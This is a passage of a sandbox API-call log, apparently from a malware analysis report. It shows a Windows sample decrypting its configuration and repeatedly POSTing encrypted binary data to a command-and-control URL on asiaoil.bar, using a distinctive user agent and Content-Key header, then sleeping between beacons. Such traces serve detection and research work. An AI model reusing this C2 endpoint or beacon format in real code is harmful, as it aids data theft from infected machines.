| out: hHeap=0x740000) returned 1 [0300.457] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0300.458] CryptDecrypt (in: hKey=0x74d768, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x763860, pdwDataLen=0x19fcfc | out: pbData=0x763860, pdwDataLen=0x19fcfc) returned 1 [0300.462] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0300.463] CryptDestroyKey (hKey=0x74d768) returned 1 [0300.463] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0300.463] CryptReleaseContext (hProv=0x75d298, dwFlags=0x0) returned 1 [0300.463] GetProcessHeap () returned 0x740000 [0300.464] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x212) returned 0x7669d8 [0300.464] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0300.464] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0300.465] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0300.465] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0300.466] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0300.466] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0300.467] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0300.467] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0300.467] GetProcessHeap () returned 0x740000 [0300.467] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x20) returned 0x75bfa8 [0300.467] getaddrinfo (in: pNodeName="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0300.468] GetProcessHeap () returned 0x740000 [0300.468] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75bfa8 | out: hHeap=0x740000) returned 1 [0300.468] GetProcessHeap () returned 0x740000 [0300.468] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x7669d8 | out: hHeap=0x740000) returned 1 [0300.468] GetProcessHeap () returned 0x740000 [0300.469] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x763860 | out: hHeap=0x740000) returned 1 [0300.469] GetProcessHeap () returned 0x740000 [0300.469] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x40) returned 0x763f20 [0300.469] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0300.470] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0300.577] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0300.578] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x75cc38) returned 1 [0300.584] GetProcessHeap () returned 0x740000 [0300.584] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x24) returned 0x758478 [0300.585] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0300.585] CryptImportKey (in: hProv=0x75cc38, pbData=0x758478, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x74d368) returned 1 [0300.586] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0300.586] CryptSetKeyParam (hKey=0x74d368, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0300.587] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0300.587] CryptSetKeyParam (hKey=0x74d368, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0300.587] GetProcessHeap () returned 0x740000 [0300.588] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x758478 | out: hHeap=0x740000) returned 1 [0300.589] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0300.589] CryptDecrypt (in: hKey=0x74d368, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x763f20, pdwDataLen=0x19fcfc | out: pbData=0x763f20, pdwDataLen=0x19fcfc) returned 1 [0300.590] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0300.590] CryptDestroyKey (hKey=0x74d368) returned 1 [0300.590] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0300.591] CryptReleaseContext (hProv=0x75cc38, dwFlags=0x0) returned 1 [0300.591] GetProcessHeap () returned 0x740000 [0300.591] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x212) returned 0x765670 [0300.591] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0300.592] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch="http://") returned 0x0 [0300.592] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0300.593] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch="https://") returned 0x0 [0300.593] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0303.109] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch="/") returned="//bobby/five/fre.php" [0303.109] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0303.110] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch=":") returned 0x0 [0303.110] GetProcessHeap () returned 0x740000 [0303.110] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x20) returned 0x75bdc8 [0303.110] getaddrinfo (in: pNodeName="asiaoil.bar", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x75c048*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c358*(sa_family=2, sin_port=0x50, sin_addr="104.21.49.244"), ai_next=0x75bf80*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c2e0*(sa_family=2, sin_port=0x50, sin_addr="172.67.197.66"), ai_next=0x0))) returned 0 [0303.112] GetProcessHeap () returned 0x740000 [0303.112] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x4) returned 0x75b600 [0303.112] socket (af=2, type=1, protocol=6) returned 0x2a4 [0303.112] connect (s=0x2a4, name=0x75c358*(sa_family=2, sin_port=0x50, sin_addr="104.21.49.244"), namelen=16) returned 0 [0303.132] FreeAddrInfoW (pAddrInfo=0x75c048*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c358*(sa_family=2, sin_port=0x50, sin_addr="104.21.49.244"), ai_next=0x75bf80*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c2e0*(sa_family=2, sin_port=0x50, sin_addr="172.67.197.66"), ai_next=0x0))) [0303.132] GetProcessHeap () returned 0x740000 [0303.132] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x7d) returned 0x75cf68 [0303.132] GetProcessHeap () returned 0x740000 [0303.132] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x201b) returned 0x767650 [0303.133] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0303.134] wvsprintfA (in: param_1=0x767650, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST //bobby/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: asiaoil.bar\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 178 [0303.134] GetProcessHeap () returned 0x740000 [0303.134] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xb4) returned 0x747868 [0303.134] GetProcessHeap () returned 0x740000 [0303.134] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x767650 | out: hHeap=0x740000) returned 1 [0303.134] GetProcessHeap () returned 0x740000 [0303.134] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3e) returned 0x7639c8 [0303.134] GetProcessHeap () returned 0x740000 [0303.134] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x1fdc) returned 0x767650 [0303.135] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0303.136] wvsprintfA (in: param_1=0x767650, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST //bobby/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: asiaoil.bar\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 579BFA72\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 243 [0303.136] GetProcessHeap () returned 0x740000 [0303.136] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xf5) returned 0x747928 [0303.136] GetProcessHeap () returned 0x740000 [0303.136] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x767650 | out: hHeap=0x740000) returned 1 [0303.142] send (s=0x2a4, buf=0x747928*, len=243, flags=0) returned 243 [0303.142] send (s=0x2a4, buf=0x761fd0*, len=159, flags=0) returned 159 [0303.142] GetProcessHeap () returned 0x740000 [0303.142] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xfd0) returned 0x755058 [0303.143] recv (in: s=0x2a4, buf=0x755058, len=4048, flags=0 | out: buf=0x755058*) returned 565 [0303.280] GetProcessHeap () returned 0x740000 [0303.281] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x747928 | out: hHeap=0x740000) returned 1 [0303.281] GetProcessHeap () returned 0x740000 [0303.281] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x7639c8 | out: hHeap=0x740000) returned 1 [0303.282] GetProcessHeap () returned 0x740000 [0303.282] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x747868 | out: hHeap=0x740000) returned 1 [0303.282] GetProcessHeap () returned 0x740000 [0303.283] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75cf68 | out: hHeap=0x740000) returned 1 [0303.283] closesocket (s=0x2a4) returned 0 [0303.285] GetProcessHeap () returned 0x740000 [0303.285] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b600 | out: hHeap=0x740000) returned 1 [0303.285] GetProcessHeap () returned 0x740000 [0303.285] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x765670 | out: hHeap=0x740000) returned 1 [0303.285] GetProcessHeap () returned 0x740000 [0303.286] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x763f20 | out: hHeap=0x740000) returned 1 [0303.286] GetProcessHeap () returned 0x740000 [0303.286] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75bdc8 | out: hHeap=0x740000) returned 1 [0303.286] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x755058, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x104c) returned 0x2a4 [0303.294] Sleep (dwMilliseconds=0xea60) [0303.309] GetProcessHeap () returned 0x740000 [0303.309] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x40) returned 0x7637d0 [0303.309] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0303.310] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0303.322] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0303.323] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x75d980) returned 1 [0303.329] GetProcessHeap () returned 0x740000 [0303.329] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x24) returned 0x758688 [0303.330] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0303.330] CryptImportKey (in: hProv=0x75d980, pbData=0x758688, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x74d768) returned 1 [0303.331] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0303.331] CryptSetKeyParam (hKey=0x74d768, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0303.332] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0303.332] CryptSetKeyParam (hKey=0x74d768, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0303.332] GetProcessHeap () returned 0x740000 [0303.333] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x758688 | out: hHeap=0x740000) returned 1 [0304.039] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0304.040] CryptDecrypt (in: hKey=0x74d768, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x7637d0, pdwDataLen=0x19fcfc | out: pbData=0x7637d0, pdwDataLen=0x19fcfc) returned 1 [0304.040] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0304.041] CryptDestroyKey (hKey=0x74d768) returned 1 [0304.041] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0304.041] CryptReleaseContext (hProv=0x75d980, dwFlags=0x0) returned 1 [0304.041] GetProcessHeap () returned 0x740000 [0304.042] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x212) returned 0x765670 [0304.042] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0304.043] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0304.043] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0304.043] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0304.044] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0304.044] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0304.045] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0304.045] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0304.045] GetProcessHeap () returned 0x740000 [0304.045] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x20) returned 0x75c098 [0304.045] getaddrinfo (in: pNodeName="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0304.046] GetProcessHeap () returned 0x740000 [0304.046] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75c098 | out: hHeap=0x740000) returned 1 [0304.046] GetProcessHeap () returned 0x740000 [0304.046] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x765670 | out: hHeap=0x740000) returned 1 [0304.046] GetProcessHeap () returned 0x740000 [0304.046] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x7637d0 | out: hHeap=0x740000) returned 1 [0304.046] GetProcessHeap () returned 0x740000 [0304.046] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x40) returned 0x763b30 [0304.047] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0304.047] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0304.055] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0304.056] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x75d7e8) returned 1 [0304.063] GetProcessHeap () returned 0x740000 [0304.063] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x24) returned 0x758688 [0304.063] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0304.064] CryptImportKey (in: hProv=0x75d7e8, pbData=0x758688, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x74d768) returned 1 [0304.065] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0304.065] CryptSetKeyParam (hKey=0x74d768, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0304.065] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0304.066] CryptSetKeyParam (hKey=0x74d768, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0304.066] GetProcessHeap () returned 0x740000 [0304.066] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x758688 | out: hHeap=0x740000) returned 1 [0304.067] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0304.067] CryptDecrypt (in: hKey=0x74d768, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x763b30, pdwDataLen=0x19fcfc | out: pbData=0x763b30, pdwDataLen=0x19fcfc) returned 1 [0304.068] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0304.068] CryptDestroyKey (hKey=0x74d768) returned 1 [0304.068] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0304.069] CryptReleaseContext (hProv=0x75d7e8, dwFlags=0x0) returned 1 [0304.069] GetProcessHeap () returned 0x740000 [0304.069] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x212) returned 0x767278 [0304.069] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0304.070] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch="http://") returned 0x0 [0304.070] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0304.070] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch="https://") returned 0x0 [0304.071] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0304.071] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch="/") returned="//bobby/five/fre.php" [0304.072] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0304.072] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch=":") returned 0x0 [0304.072] GetProcessHeap () returned 0x740000 [0304.072] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x20) returned 0x75c110 [0304.072] getaddrinfo (in: pNodeName="asiaoil.bar", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x75bdc8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c358*(sa_family=2, sin_port=0x50, sin_addr="104.21.49.244"), ai_next=0x75c048*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c3b8*(sa_family=2, sin_port=0x50, sin_addr="172.67.197.66"), ai_next=0x0))) returned 0 [0304.074] GetProcessHeap () returned 0x740000 [0304.074] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x4) returned 0x75b610 [0304.074] socket (af=2, type=1, protocol=6) returned 0x2a8 [0304.074] connect (s=0x2a8, name=0x75c358*(sa_family=2, sin_port=0x50, sin_addr="104.21.49.244"), namelen=16) returned 0 [0304.096] FreeAddrInfoW (pAddrInfo=0x75bdc8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c358*(sa_family=2, sin_port=0x50, sin_addr="104.21.49.244"), ai_next=0x75c048*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c3b8*(sa_family=2, sin_port=0x50, sin_addr="172.67.197.66"), ai_next=0x0))) [0304.096] GetProcessHeap () returned 0x740000 [0304.096] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x7d) returned 0x75d540 [0304.096] GetProcessHeap () returned 0x740000 [0304.096] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x201b) returned 0x767650 [0304.097] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0304.098] wvsprintfA (in: param_1=0x767650, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST //bobby/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: asiaoil.bar\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 178 [0304.098] GetProcessHeap () returned 0x740000 [0304.098] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xb4) returned 0x747868 [0304.098] GetProcessHeap () returned 0x740000 [0304.099] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x767650 | out: hHeap=0x740000) returned 1 [0304.099] GetProcessHeap () returned 0x740000 [0304.099] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3e) returned 0x763c98 [0304.099] GetProcessHeap () returned 0x740000 [0304.099] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x1fdc) returned 0x767650 [0304.100] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0304.124] wvsprintfA (in: param_1=0x767650, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST //bobby/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: asiaoil.bar\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 579BFA72\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 243 [0304.124] GetProcessHeap () returned 0x740000 [0304.124] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xf5) returned 0x747928 [0304.124] GetProcessHeap () returned 0x740000 [0304.125] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x767650 | out: hHeap=0x740000) returned 1 [0304.125] send (s=0x2a8, buf=0x747928*, len=243, flags=0) returned 243 [0304.126] send (s=0x2a8, buf=0x761fd0*, len=159, flags=0) returned 159 [0304.126] GetProcessHeap () returned 0x740000 [0304.126] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xfd0) returned 0x755058 [0304.126] recv (in: s=0x2a8, buf=0x755058, len=4048, flags=0 | out: buf=0x755058*) returned 565 [0304.223] GetProcessHeap () returned 0x740000 [0304.224] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x747928 | out: hHeap=0x740000) returned 1 [0304.224] GetProcessHeap () returned 0x740000 [0304.224] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x763c98 | out: hHeap=0x740000) returned 1 [0304.225] GetProcessHeap () returned 0x740000 [0304.225] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x747868 | out: hHeap=0x740000) returned 1 [0304.225] GetProcessHeap () returned 0x740000 [0304.226] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75d540 | out: hHeap=0x740000) returned 1 [0304.226] closesocket (s=0x2a8) returned 0 [0304.226] GetProcessHeap () returned 0x740000 [0304.226] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b610 | out: hHeap=0x740000) returned 1 [0304.226] GetProcessHeap () returned 0x740000 [0304.227] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x767278 | out: hHeap=0x740000) returned 1 [0304.227] GetProcessHeap () returned 0x740000 [0304.227] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x763b30 | out: hHeap=0x740000) returned 1 [0304.227] GetProcessHeap () returned 0x740000 [0304.228] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75c110 | out: hHeap=0x740000) returned 1 [0304.228] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x755058, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1050) returned 0x2a8 [0304.229] Sleep (dwMilliseconds=0xea60) [0304.231] GetProcessHeap () returned 0x740000 [0304.231] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x40) returned 0x763980 [0304.232] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0304.232] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0304.236] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0304.237] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x75d980) returned 1 [0304.244] GetProcessHeap () returned 0x740000 [0304.267] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x24) returned 0x758778 [0304.268] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0304.268] CryptImportKey (in: hProv=0x75d980, pbData=0x758778, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x74d368) returned 1 [0304.269] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0304.269] CryptSetKeyParam (hKey=0x74d368, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0304.270] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0304.270] CryptSetKeyParam (hKey=0x74d368, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0304.270] GetProcessHeap () returned 0x740000 [0304.270] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x758778 | out: hHeap=0x740000) returned 1 [0304.271] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0304.272] CryptDecrypt (in: hKey=0x74d368, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x763980, pdwDataLen=0x19fcfc | out: pbData=0x763980, pdwDataLen=0x19fcfc) returned 1 [0304.272] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0304.272] CryptDestroyKey (hKey=0x74d368) returned 1 [0304.273] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0304.273] CryptReleaseContext (hProv=0x75d980, dwFlags=0x0) returned 1 